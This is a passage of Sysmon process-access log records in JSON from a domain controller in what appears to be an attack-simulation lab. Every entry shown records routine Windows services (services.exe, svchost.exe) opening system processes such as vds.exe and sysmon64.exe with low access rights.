05:46:45.996","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"924","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001066B80200}","TargetProcessId":"2748","TargetImage":"C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1273,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.998\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 924\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010A7E40200}\r\nTargetProcessId: 3420\r\nTargetImage: C:\\Windows\\System32\\vds.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.998","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"924","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010A7E40200}","TargetProcessId":"3420","TargetImage":"C:\\Windows\\System32\\vds.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1274,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.016\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.016","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1275,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.016\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.016","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1276,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.016\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.016","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1277,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.016\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.016","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1278,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.031\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.031","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1279,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.031\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010A7E40200}\r\nTargetProcessId: 3420\r\nTargetImage: C:\\Windows\\System32\\vds.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.031","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010A7E40200}","TargetProcessId":"3420","TargetImage":"C:\\Windows\\System32\\vds.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1280,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.031\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 